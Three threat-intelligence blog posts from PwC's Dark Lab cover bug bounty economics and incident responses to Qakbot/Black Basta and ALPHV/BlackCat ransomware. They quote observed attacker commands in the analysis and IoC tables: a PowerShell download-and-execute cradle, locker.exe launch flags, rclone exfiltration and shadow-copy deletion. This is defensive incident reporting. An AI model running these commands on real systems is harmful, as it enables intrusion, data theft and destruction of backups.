Feel free to contact us at [darklab dot cti at hk dot pwc dot com] for any further information.

Bug Bounty Programs – a Public Good that is a Necessity for Corporates, SMEs, and Individuals Alike

Posted on April 24, 2023 by darklabhk

As the cyber threat landscape continues to evolve and threat actors increasingly target vulnerable external-facing assets, bug bounties present organizations with an opportunity to proactively identify and remediate vulnerabilities before they can be exploited by attackers.

In today’s digital age, cyber threats have become increasingly prevalent, and enterprises are struggling to keep up with the pace of these threats. This is evident in the number of disclosed vulnerabilities and identified zero-days. For example, the number of vulnerabilities increased from 20,171 in 2021 to 25,227 in 2022, which represented a growth rate of 25 percent [1]; meanwhile, there were 80 zero-days exploited in the wild in 2021, which is more than double the previous record volume in 2019. [2] These statistics indicate that the traditional methods of cybersecurity are no longer sufficient to protect businesses from evolving cyber-attacks.

As a result, bug bounty programs have become increasingly popular as a way for organizations to identify and remediate vulnerabilities in their systems. These programs offer organizations the opportunity to leverage the skills of the global cybersecurity community to identify vulnerabilities in their systems and applications. PwC’s Dark Lab explores the benefits of bug bounty programs, along with the potential roadblocks that hinders its wide-scale implementation, and proposes potential solutions that reduces the barriers to entry such that enterprises can leverage it is a viable business risk management strategy to tackle the dynamic cyber risk landscape.

Bug Bounty Programs – An Overview

A bug bounty programme allows organizations to define and scope a program where security researchers are allowed to try to identify security vulnerabilities – often within a subset of the organisation’s technical infrastructure – in exchange for financial or non-financial ‘bounties’ for successfully validated vulnerabilities. Bug bounty programs were introduced by NetScape in 1995, though have evolved significantly since then. [3] Today, there are multiple bug bounty platforms and services available that provide organizations with a streamlined way to engage with the cybersecurity community, including HackerOne, BugCrowd, and YesWeHack. One notable example of a successful bug bounty program is the Microsoft Bug Bounty Program, in which US$13.7 million to more than 330 security researchers across 46 countries in 2021. [4]

Governments have also recognized the importance of bug bounty programs in strengthening their nation’s cybersecurity posture. For example, review of 2018 Cybersecurity Act Paragraph 5 suggests that service providers providing traditional cybersecurity assessment services (e.g., vulnerability scan or penetration test) must first obtain a license [5], whereas companies providing bug bounty platforms and/or services are exempted [6], implies that the Ministry of Communications and Information (MCI) and the Cyber Security Agency of Singapore (CSA) regards bug bounty programs in higher esteem – more of a public good as it underscores a greater value brought to society.

Issues Faced by Bug Bounty Programs

Despite the growth of bug bounty programs, there are still market barriers that prevent the public good from being consumed. One major issue is the pricing of the vulnerability, given vendors determine the value of a bug. The lack of a “free market” in which security researchers are not properly incentivized leads to a “tragedy of the commons” situation, in which they seek for a greater economic reward of their proof-of-concepts in alternate markets, such as the dark web or to established threat actors. The pricing misalignment is compounded by the lack of legal protection and standardized guidance for security researchers to identify and disclose vulnerabilities, which further makes it less likely for them to obtain a payout due to the plethora of grey areas which may inadvertently lead to potential punishment. [7] This is also not helped by poor communication in certain cases, where there is a lack of criteria or requirements on the compensating schemes, restrictions and limitations, and handling of duplicated reports. [8]

Meanwhile, not all hackers are not motivated by money. For example, espionage threat actors are looking for information, and hence no amount of financial incentive would lead to them disclosing and/or monetizing their zero days. [9] And in general, most researchers are motivated by more than one or a combination of factors and motivations, such as prestige or to advance their career, for the challenge or to have fun, or for other ethical or ideological reasons, so it is not feasible to focus solely on financial incentives. [10] Meanwhile, bug bounty programs were also meant to address the lack of a large number of skilled and qualified security researchers who know how to “hack to earn” by crowdsourcing vulnerability identification; this continues to be an issue despite bug bounty programs being in place for over 25 years. [11]

How to Address those Issues?

There are several ways to fix the potential problems surrounding bug bounty programs. One solution is to have an independent platform that connects security researchers with organizations, similar to Uber. This platform would allow for rewards to be based on an amount that can be auctioned at the right price, with the oversight of the technology owner. This platform should connect the right level of talent with the right buyer, such that they can align on their incentives.

Another solution is to enhance legal frameworks, similar to what Singapore has done, to recognize the importance of bug bounty programs and to have certified or accredited personnel to perform this task. The legal framework should mandate companies to implement and operationalize a vulnerability disclosure policy (VDP) to provide straightforward guidelines for the cybersecurity research community and members of the general public on conducting good faith vulnerability discovery activities directed at public facing and/or internal applications and services. This VDP also instructs researchers on how to submit discovered vulnerabilities, impacted security vendor(s) (if applicable), and other relevant parties (where applicable) ethically and in a safe manner, with clear guidelines on how to disclose such vulnerabilities.

Finally, there needs to be an investment in talent development to ensure that there is a sufficient number of skilled and qualified security researchers who know how to “hack to earn” by finding vulnerabilities in the first place. Ideally, the legal framework should also mandate the need for security researchers to attain certifications and accreditations with practical elements. That would have a positive downstream impact on investment in cybersecurity education and training, thereby establishing a healthy pipeline of skilled cybersecurity professionals who can join bug bounty programs.

Conclusion

Despite the challenges, bug bounty programs offer significant benefits to organizations looking to strengthen their cybersecurity posture. By reducing the barriers to entry, bug bounty programs can be used as an effective business risk management strategy. In addition, the success of bug bounty programs may lead to the potential rise and fall of other connected markets. This includes the potential drop-off of cyber insurance as security researchers would look to profit in legal markets rather than parallel markets like the dark web, or the reduction in traditional vulnerability assessment and penetration testing services as bug bounty programs are continuously run. Meanwhile, new service offerings such as talent development may arise to ensure there is a greater demand of security researchers to meet the increased desire to identify and “supply” vulnerabilities. We expect the adoption of bug bounties in Hong Kong and globally to pick up in the next five years, as it is a cost-effective way to improve cybersecurity through crowdsourcing to qualified security researchers with diverse backgrounds and varying degrees of experience.

Further information

Feel free to contact us at [darklab dot cti at hk dot pwc dot com] for any further information.

Secure Your Holidays: The Case of Qakbot and Black Basta

Posted on March 10, 2023 by darklabhk

On the eve of Christmas, a suspected Black Basta affiliate conducted a ‘quick and dirty’ attack on a global client, lending insight into the opportunistic targeting of victims during holiday downtime periods.

The Significance of Dates

The holidays are a time for rest and rejuvenation for most. But for attackers, the holidays present a timely opportunity to exploit weakened security postures for a higher likelihood of successful intrusion. Attackers have been consistently observed to exploit the predictable patterns of organisations’ limited cyber preparedness during holiday seasons, largely driven by the shortage of personnel and lack appropriate response preparation measures, to achieve a ‘quick and dirty’ infiltration. Beyond opportunistic exploitation of weakened defences during the holidays, attackers are observed to conduct targeted attacks on dates of significance (e.g., political, religious, historical, legal dates of importance) as a means of taking a stance on a divisive topic or sending a clear message. In certain incidents, the date of intrusion attempts can provide a valuable indicator into the motivations and intentions of the threat actor behind the attack.

PwC’s Dark Lab have continuously observed the trend of increased incidents surrounding major holidays and dates of significance (e.g., Christmas, Chinese New Year, etc.), including our recent incident featuring the Qakbot banking trojan and attributed to the Black Basta ransomware-as-a-service (RaaS) group.

Initial Access: Conversation Hijacked

The incident was initiated by a phishing email disguised as a customer request to deliver the Qakbot banking trojan malware. Notably, the threat actor leveraged an old email thread dating back to January 2020 to the victim’s shared mailbox, as a means of leveraging an existing conversation with established trust to exhibit legitimacy.

We purposely do not disclose the email in this blog as the original mail sender is legitimate and was likely compromised. It was discovered via open source intelligence (OSINT) that the legitimate sender emails leveraged by the affiliate were potentially harvested during the 2021 ProxyLogon-related compromises that targeted vulnerable Microsoft Exchange Servers to perform thread hijacking, whereby attackers harvest legitimate emails to launch targeted phishing campaigns against previously uncompromised organisations. [1] The following key indicators were observed, validating our hypothesis that thread hijacking was conducted;

(1) Phishing emails were likely sent from a spoofed sender address, as evidenced by the SoftFail Sender Policy Framework (SPF) record indicating that the IP address may or may not be authorised to send from the domains. An SPF record facilitates spoofed email prevention and anti-spam control and acts as a filter to assess the authenticity of an email. A SPF soft fail occurs when an unauthorised sender email is received and quarantined in the victim’s spam folder, flagging the email as potentially suspicious. [2]
(2) The spear phishing link directed to the domain osiwa[.]org, which has been flagged by the community twice in 2023 to be malicious and associated with Qakbot. [3] As at the time of the incident, the phishing link displayed a HTTP status code 404, though we observed osiwa[.]org was scanned up to eight times between 1 December 2022 and 2 March 2023, potentially indicating that a number of other organisations had received a similar malicious link directing them to download the Qakbot malware.
(3) The affiliate performed partial scrubbing of the email header information during construction of their malicious email to remove content that does not align with their malicious content.
(4) Prior to the malicious email in Q4 2022, the last email in the thread was observed from 2020, indicating that the email was likely harvested as a result of the 2021 ProxyLogon mass exploitation for the purpose of thread hijacking.

Our analysis into the known-bad IP addresses reveal that six (6) of them – 24.69.84[.]237, 50.67.17[.]92, 70.51.136[.]204, 149.74.159[.]67, 38.166.221[.]92, and 173.76.49[.]61 – have been flagged by the community as associated with Qakbot campaigns in the past.

In addition, a seventh IP address observed in the incident – 108.62.118[.]131 – has been reported to direct to a Cobalt Strike C2 Server. This IP has further been flagged on social media in multiple occasions to resolve to various malicious URLs registered via Namecheap. [4],[5] This, along with the fact that the ASN 30633 was LEASEWEB, are suspicious indicators suggesting it was a throwaway infrastructure potentially being deployed for malicious use.

Upon clicking on the phishing link, the malicious ZIP file was downloaded, and the victim unsuspectingly opened the file, initiating the execution phase. Post-infiltration, the victim’s endpoint detection alerted a potentially suspicious connection associated with FIN7’s (also known as Carbanak) C2 infrastructure. This observation enabled PwC’s Dark Lab analysts to discover that custom toolkits exclusively utilized by the Black Basta ransomware group have overlapping technical characteristics with FIN7, with further evidence to suggest that the custom tools leveraged by Black Basta may have potentially been developed by FIN7’s malware developers. [6] Further, given that Black Basta is widely recognized to leverage Qakbot for initial access in their campaigns, we posit with high confidence that the attack was conducted by a Black Basta affiliate.

*Figure: Screenshot of our VirusTotal pivoting that attributed six IP addresses that were observed in your environment to be associated with Qakbot banking trojan.*

Ransomware-as-a-Service Group Behind the Attack: Black Basta

Black Basta is a Russian-speaking ransomware group that operates as a Ransomware-as-a-Service (RaaS) affiliate network. First observed in early 2022, Black Basta is an evolution of the Conti ransomware, offering both Windows and Linux ransomware variants and known to perform double extortion – data encryption and listing stolen data on their leak site unless ransom demands are met. [7] To date, the group have been observed to compromise at least 193 victims across geographies and industries, as listed on their data leak site. Observations of Black Basta’s targeting history indicates no specific targeting against industries, reinforcing the group’s opportunistic nature financially driven motives.

Escalating Privileges

Post-infiltration via Qakbot, the suspected Black Basta affiliate established a call back connection to their C2 server and subsequently performed credential dumping to successfully obtain administrator access on the victim’s Domain Controller server.

Establishing Persistence and Lateral Movement

The affiliate proceeded to implant multiple backdoors to and leveraged domain administrator privileges to perform remote desktop protocol (RDP) via a PowerShell payload execution to establish persistence, gain remote control of the compromised hosts and laterally move across environments. Notably, we observed that the affiliate was capable of performing a cross-domain attack, compromising victims across geographical regions.

Defense Evasion

To evade detection, the threat actor disabled the Wazuh agent, an open-source security monitoring solution commonly leveraged by enterprise users as their Extended Detection and Response (XDR) and Security Information and Event Management (SIEM) logging platform.

Impact

Once defences were impaired, the affiliate proceeded to deploy the Black Basta ransomware on compromised environments by abusing rundll32.exe to stealthily execute the ransomware via proxy execution. In one instance, the actor was observed to utilise Secure File Transfer Protocol (SFTP) to exfiltrate data from the compromised server to a cloud-hosted server on Digital Ocean (142.93.198[.]225), though no compromised victim data was observed to be listed on Black Basta’s leak site.

As with all RaaS leak sites, we are unable to ascertain if the threat actor lists all their victims on their leak site. Though, per our experience, this is unlikely for a variety of reasons. Per our analysis of the Black Basta leak site, we noted that zero and partial (e.g. 30%) of complete publishing of data is possible. While there is no way to effectively prove the disclosed percentage of leakage, this suggests that Black Basta may choose to leak data in phases as part of their double extortion technique.

Meanwhile, anecdotal analysis of the published victims listed on the leak site indicates that previous victims that publicly announced the breach had a lead time of between one to three weeks prior to being listed on Black Basta’s leak site. While we do not have evidence to suggest that certain victims may not be listed, we assess the likelihood of Black Basta leaking data of undisclosed victims beyond the three-week period to be relatively lower, though not impossible given our previous experience with RaaS groups and cybercriminals.

Conclusion

Based on the findings of our investigation, PwC’s Dark Lab posits with high confidence that an affiliate of the Black Basta ransomware cybercriminal group were likely behind the incident. The incident was observed to take place within a short timeframe, with malicious actor(s) infiltrating the victim’s environment and subsequently escalating privileges on day one of the attack, followed by lateral movement, ransomware execution, and data exfiltration on day two. Given the timeliness of the incident, we posit the attacker intentionally targeted the victim during the holiday period under the assumption that the victim had limited capacity to detect and respond to their attack.

Recommendations

As RaaS groups continuously persist and evolve their attack vectors, it is vital that organisations implement robust, layered defence strategies based on the concept of zero trust.

Develop and maintain a contingency plan for holiday periods with expected limitations of manpower and capacity, ensuring allocated on-call members are regularly briefed on the incident response measures in case of attack
Implement a zero-trust security architecture to limit the likelihood of successful intrusion and/or containment of potentially impending attacks
Enhance email security controls (e.g., anti-phishing controls, sandbox analysis, etc.) on email security gateways and network devices (including external firewalls, web proxies)
Educate your employees, particularly those in roles that regularly interact with unknown senders (e.g., sales, customer service, human resources, finance, etc.) of the potential indicators to identify and report potential email thread hijacking attempts (e.g., spoofed senders, old email threads, partially scrubbed email addresses, malformed replies, repetitive use of the same harvested legitimate email, etc.).
Maintain “tertiary” offline backups (i.e., tertiary backup) that are encrypted and immutable (i.e., cannot be altered or deleted). This should be atop of your existing secondary data backups that should adopt security best practices, in particular network segmentation with your production and/or primary site
Perform a review of access management with respect to identity and network access (e.g., removal of legacy and unused accounts, housekeeping of privileges for all accounts, and enforce network segmentation to tighten access to key servers)
Enforce network segmentation, including identity segmentation in line with zero trust policies to restrict access based on identities, to reduce your attack surface and contain the potential impact of a ransomware attack

MITRE ATT&CK TTPs Leveraged

We include the observed MITRE ATT&CK tactics and techniques elaborated from part one of the blogpost. We will expand this list as we deep-dive into the affiliates’ TTPs as observed from our incident response experience in Q1 2022.

T1588.001 Obtain Capabilities: Malware
T1586 Compromise Accounts: Email Accounts
T1566.002 Phishing: Spear Phishing Link
T1199 Trusted Relationship
T1059.001 Command and Scripting Interpreter: PowerShell
T1204 User Execution
T1078.002 Valid Accounts: Domain Accounts
T1562.001 Impair Defenses: Disable or Modify Tools
T1021.002 Remote Services: SMB/Windows Admin Shares
T1428 Exploitation of Remote Services
T1003.006 OS Credential Dumping: DCSync
T1572 Protocol Tunneling
T1071 Application Layer Protocol: Cobalt Strike Beacon
T1041 Exfiltration Over C2 Channel
T1486 Data Encrypted for Impact

Indicators of Compromise (IoCs)

We include the observed IoCs in our encounter with Qakbot and Black Basta.

Indicator	File Type
`37bf163c9a37e27cdbb8c5db31457063`	Malicious Compiled Script (DLL)
`142.93.198[.]225`	IP Address – Resolving to Digital Ocean
`50.67.17[.]92`	Known-Bad IP – Associated with Qakbot Campaigns
`149.74.159[.]67`	Known-Bad IP – Associated with Qakbot Campaigns
`24.69.84[.]237`	Known-Bad IP – Associated with Qakbot Campaigns
`70.51.136[.]204`	Known-Bad IP – Associated with Qakbot Campaigns
`38.166.221[.]92`	Known-Bad IP – Associated with Qakbot Campaigns
`108.62.118[.]131`	Known-Bad IP – Cobalt Strike C2 Server
`173.76.49[.]61`	Known-Bad IP – Associated with Qakbot Campaigns
`23.106.223[.]214`	C2 IP

Further information

Feel free to contact us at [darklab dot cti at hk dot pwc dot com] for any further information.

The Black Cat’s Out of the Bag

Posted on September 6, 2022 by darklabhk

Dark Lab responded to a lesser seen ransomware breed in Hong Kong attributable to ALPHV/BlackCat. We outline the tactics, techniques and procedures of the threat actor, and share our recommendations to ensure readers do not have a cat in hell’s chance of becoming the next victim.

In the second half of 2022, Dark Lab responded to an incident impacting a non-profit professional services organization in Hong Kong. Available evidence suggests that one of the affiliates of the cybercriminal group ALPHV, otherwise known as BlackCat Ransomware-as-a-Service (RaaS), were likely behind the incident.

Reports of BlackCat first emerged in mid-November 2021, and the RaaS group swiftly gained notoriety for their use of the unconventional programming language RUST, their flexibility to self-propagate and target multiple devices and operating systems, and a growing affiliate base with previous links to prolific threat activity groups including DarkSide/BlackMatter and Lockbit 2.0 RaaS programmes.[1] The financially motivated cybercriminal groups’ targets are selected opportunistically rather than with an intent to target specific sectors or geographies but have been observed from their leak site as of 31 August 2022 to have successfully targeted 136 organisations across the United States, Europe, and the Asia Pacific region.

BlackCat is a lesser seen ransomware breed in Hong Kong. However, we posit they may continue to target the region, due to their opportunistic nature and scalability through their affiliate network. In this blog, we will analyse Dark Lab’s recent encounter with BlackCat, their Tactics, Techniques, and Procedures (TTPs), and share insights and recommendations on how to detect and respond to prospective attacks.

Analysis and Exploitation in the wild

Initial Access

Based on the available audit logs, the threat actor likely leveraged a critical remote code execution vulnerability CVE-2019-0708 or BlueKeep in Remote Desktop Services – formerly known as Terminal Services – that affects selected older versions of Windows.[2] To exploit this vulnerability, an unauthenticated attacker would need to send a specially crafted request to the target systems Remote Desktop Service via Remote Desktop Protocol (RDP). An attacker who successfully exploited this vulnerability could execute arbitrary code on the target system, including installing programs; view, change, or delete data; or create new accounts with full user rights.[3] It should be noted that the RDP service itself is not vulnerable.

It was observed over the first three (3) days that the three of five (3 of 5) potentially malicious IP addresses to gain access to the vulnerable workstation in the victim environment, which was exposed to the Internet. The first two IP addresses logged in one day apart, and per various public sources have been flagged as potentially malicious dating back to December 2021.[4] The time spent in the environment was observed to be minimal and no more than a couple of hours combined, with specific execution of the Advanced Port Scanner and Mimikatz observed in the second session. More details will be elaborated in the next section.

Meanwhile, the third IP address was not previously reported to be malicious. The time spent in the environment was increased to almost eight (8) hours, though based on the available audit logs we were unable to ascertain the actions of the threat actor. Notably, the threat actor then remained silent for slightly over one (1) week between the initial login from the third IP address to the subsequent login of the fourth IP address. A fifth IP address was also observed to have logged on to the vulnerable workstation thereafter.

While we are unable to attribute any of those five (5) IP addresses to specific threat actors, we hypothesize that there are two groups of threat actors – the first being an initial access broker as categorized by the first two IP addresses, and the second being the BlackCat affiliate as categorized by the remaining three IP addresses.

Suspected Threat Actor	Country	Reported Malicious	Reported Malicious on OSINT Platforms	Days of Access	Reported Malicious on OSINT Platforms
Initial Access Broker	Belize	Yes	April 2022	Day 1	5 mins
Initial Access Broker	Russia	Yes	June 2022	Day 2	1 hour
BlackCat Affiliate	Russia	No	–	Day 3	7 hours
BlackCat Affiliate	USA	No	–	Day 10	9 hours
BlackCat Affiliate	USA	No	–	Day 10	2 days 4 hours

Through investigation into the user account compromised, we determined that the victim’s device was unknowingly exposed to the Internet due to a multi-homing issue, whereby their device was connected to both the corporate network as well as a standalone network with an external firewall and network configurations and that exposed the device to the Internet. It was further observed that the workstation had not been updated for multiple years, leaving the device unpatched and vulnerable to exploitation.

CVE(s)	CVE-2019-0708
First Published Date	26 November 2018
CVSS v3	9.8
Affected Versions	Windows 7, Windows Server 2008 R2, Windows Server 2008 and earlier.
Description	A remote code execution vulnerability exists in Remote Desktop Services formerly known as Terminal Services when an unauthenticated attacker connects to the target system using RDP and sends specially crafted requests, aka ‘Remote Desktop Services Remote Code Execution Vulnerability.[5]
Potential Impact	Remote Code Execution Vulnerability enables threat actors to gain initial access and execute the malicious code.
Proof of Concept (PoC) Available	Yes[6]
Exploited in the Wild	Yes[7]
Patch Available	Yes. Update to Windows Server 2012 or above. We highly recommend installing the latest Windows version for patches against additional unrelated vulnerabilities.
Workaround Available	Microsoft[8] has provided potential workarounds: • Disable Remote Desktop Services if they are not required. • Enable Network Level Authentication (NLA) on systems running supported editions of the affected Windows versions. • Block TCP port 3389 at the enterprise perimeter firewall.

Credential Access and Discovery by Suspected Initial Access Broker

We observed the threat actor deployed Advanced Port Scanner[9] to scan the network for open ports on network computers to identify weakened pathways.

The threat actor proceeded to execute Mimikatz[10] to dump the Local Security Authority Server Service (LSASS) process memory and obtain various credentials, including an account with domain administrator rights. This credential was later used for lateral movement.

Handover to Suspected BlackCat Affiliate for Further Discovery and Command & Control

It was observed that the threat actor executed a PowerShell command, Cobalt Strike BEACON (beacon.exe) [11] to initiate a connection with their command-and-control (C2) server, establishing a foothold on the victim network. The C2 enabled remote access to the environment without RDP, as well as further infiltration by leveraging various features provided by the implant.

The threat actor established a connection to a Cobalt Strike Beacon hosted on a public cloud server, potentially to collect their various toolkits by executing this command: powershell.exe -nop -w hidden -c IEX ((new-object.netclient).downloadstring("http:///a’). Subsequently, the threat actor deployed AdFind.exe [12] to perform active directory reconnaissance, enabling them to retrieve a list of accounts within the network.

BlackCat affiliates have been observed in the past to leverage AdFind.exe in conjunction with PowerShell to establish a persistent foothold on a target network, and thereafter downloading and executing malicious payloads.[13] The fact that the threat actor did this only from the fourth and fifth IP instead of the first three IP addresses lends more credence to the hypothesis that we make that the first set of IP addresses were initial access broker.

Lateral Movement

Through their enumeration of the victim’s environment, the threat actor was able to identify their critical systems ideal for targeting, including the domain controller server, back-up servers, and the anti-virus management server. It was observed by the threat actor that the anti-virus management server had no Endpoint Detection and Response (EDR) installed. Selective targeting of critical systems with no EDR coverage is a common practice among sophisticated threat actors as they present an ideal environment for attackers to arbitrate their attack while stealthily evading detection.

Subsequent to identifying the critical systems, the threat actor leveraged the stolen domain administrator account to initiate a remote desktop (RDP) connection. This enabled the threat actor to laterally move from the compromised multihoming workstation to the targeted endpoints due to the flat network environment, as a result of basic or lack of network segmentation in place.

Defense Evasion

It was observed that the threat actor exercised various acts of defense evasion through the use of masquerading tools and lateral movement. A key indicator tying this incident to BlackCat RaaS is the renaming of their tools an evasive manoeuvre often used by BlackCat affiliates to hide their malicious tools and make the process appear as if it is the original Windows svchost process.[14]

Exfiltration

The threat actor proceeded to manually deploy the malware on the anti-virus management server, initiating the self-propagation process whilst deploying rclone.exe[15] to exfiltrate the data to their cloud storage hosted on MEGACloud. Notably, while the New Zealand cloud service, MEGACloud, is a legitimate and trusted platform, it is also a popular service for hackers due to the platform’s unique payment feature allowing users to pay by Bitcoin.[16]

It has been reported by security researchers that BlackCat affiliates leverage rclone.exe to collect and exfiltrate extensive amounts of data from their victim’s network.[17] The threat actor executed the following command to exfiltrate data from the target network: ProgramData\rclone.exe

Impact

The threat actor exercised encryption of the exfiltrated data and executed locker.exe on various endpoints with the following commands:

C:\Windows\locker.exe" --child --access-token --verbose
C:\Windows\locker.exe" --access-token -v --no-prop-servers \ –propagated

The commands activate the BlackCat payload. Command 2 provides an indicator (“no-props-servers”) that the malware has the capability to self-propagate, but the threat actor strategically targeted critical servers for propagation, omitting servers likely to detect their movements.

It is worth noting that self-propagation is not a common feature of ransomwares. Ultimately, the goal of threat actors is to gain a foothold on a network as quick as possible for exfiltration and extortion. Self-propagation can work against this need for speed, as it requires time in the resource development phase to enumerate the network and select their targets, as well as a manual deployment of the attack. With that said, after the initial deployment the BlackCat ransomware is able to self-propagate, scaling across the network quickly – establishing their foothold whilst evading detection.

Conclusion

BlackCat affiliates work on behalf of the BlackCat group to conduct human-operated ransomware campaigns, opportunistic in nature. With a sophisticated toolkit, various evasion tactics including the RUST-written malware and self-propagating features, BlackCat RaaS poses a significant threat to organisations with conventional security systems. Organisations are encouraged to review the TTPs leveraged by BlackCat affiliates as a result of our recent incident response experience to improve their preventative and detective controls.

Recommendations

As mentioned in the previous blog posts, defending against human-operated ransomware incidents are extremely challenging, but not impossible if organisations adopt a defense-in-depth approach. The following guiding principles should be observed, atop of those already listed in the previous blog post:

Implement a robust threat and vulnerability management programme that leverages cyber threat intelligence to defend against human-operated ransomware incidents.
Design, implement, and operate an enterprise security architecture that embeds the concept of zero trust to focus on protecting critical resources (assets, services, workflows, network accounts, etc.), and not specifically just for network segments, as the network location is no longer seen as the prime component to the security posture of the resource.
Segment networks where operationally practical to prevent the spread of ransomware by controlling traffic flows between various subnetworks and by restricting adversary lateral movement. Disable unused administrative ports internally, such as Remote Desktop Protocol (RDP).
Identify, detect, and investigate abnormal activity and potential traversal of the threat actor across the network, such as ensuring coverage of Endpoint Detection and Response (EDR) tools on critical endpoints, including workstations, laptops and servers.
Perform malicious account and group policy creation to identify unauthorized changes and misconfigurations in your organisation’s network environment
Regularly perform a review for network and host-based assets for complete stock-taking to identify unpatched or misconfigured devices. Specifically, to maintain an inventory of assets, with clear indication of the critical systems and sensitive data, mapped to business owners and the relevant security controls to manage cyber risk.
Create a blacklist for the identified indicators of compromise (“IOC”) shared below to enable network-wide blocking and detection of attempted entry or attack and set up ongoing monitoring on the dark web and BlackCat leak site.

In addition, we strongly urge organisations that have deployed the vulnerable versions of Windows operating systems to execute the remediation actions outlined in the blog post, if not already completed.

MITRE ATT&CK TTPs Leveraged

We include the observed MITRE ATT&CK tactics and techniques elaborated from the incident.

Active Scanning – T1595
Gather Victim Identity Information: Credentials – T1589.001
Credential Dumping – T1003
Account Discovery: Domain Account – T1087.002
Valid Accounts – T1078
Domain Accounts – T1078.002
Command and Scripting Interpreter – T1059
External Remote Services – T1133
Domain Trust Discovery – T1482
Remote System Discovery – T1018
Impair Defenses – T1562
OS Credential Dumping – T1003
File and Directory Discovery – T1083
Network Service Discovery – T1046
Network Share Discovery – T1135
System Information Discovery – T1082
Remote Access Software – T1219
Data Encrypted for Impact – T1486
Service Stop – T1489
Web Service – T1102
Lateral Tool Transfer – T1570
Remote Services – T1021
System Services: Service Execution – T1569.002
Ingress Tool Transfer – T1105
Remote Services: SMB/Windows Admin Shares – T1021.002
Exfiltration Over Web Service: Exfiltration to Cloud Storage – T1567.002
Transfer Data to Cloud Account – T1537
Data Encrypted for Impact – T1486

Indicators of Compromise (IoCs)

Indicator	Type
C:\users\<user>\desktop\sharefinder.ps1	Script
svchost.exe -connect ip:8443 -pass password	Process execution
powershell.exe -nop -w hidden -c IEX ((new-object.netclient).downloadstring(“http[:]//ip[:]80/a’))	Powershell execution
C:\Users\<user>\Desktop\locker.exe C:Windows\locker.exe	Executable File
C:\ProgramData\AdFind.exe	Executable File
C:\ProgramData\system\svchost.exe	Executable File
C:\ProgramData\svchost.exe	Executable File
C:\users\<user>\videos\beacon.exe	Executable File
ProgramDataLocalSystem/Upload/beacon.exe	Executable File
SYSVOL\Users\<user>\Videos\beacon.exe	Executable File
C:\admin\.exe	Executable File
C:\windows\users\test\pictures\64\86.exe	Executable File
C:\windows\users\test\pictures\WebBrowserPassView.exe	Executable File
C:\windows\users\test\pictures\PsExec64.exe	Executable File
C:\windows\users\test\pictures\PsExec.exe	Executable File
C:\windows\users\test\pictures\Advanced_Port_Scanner_2.5.3869.exe	Executable File
C:\windows\system32\cmd.exe” /c “vssadmin.exe Delete Shadows /all /quiet	Command Execution

Further information

Feel free to contact us at [darklab dot cti at hk dot pwc dot com] for any further information.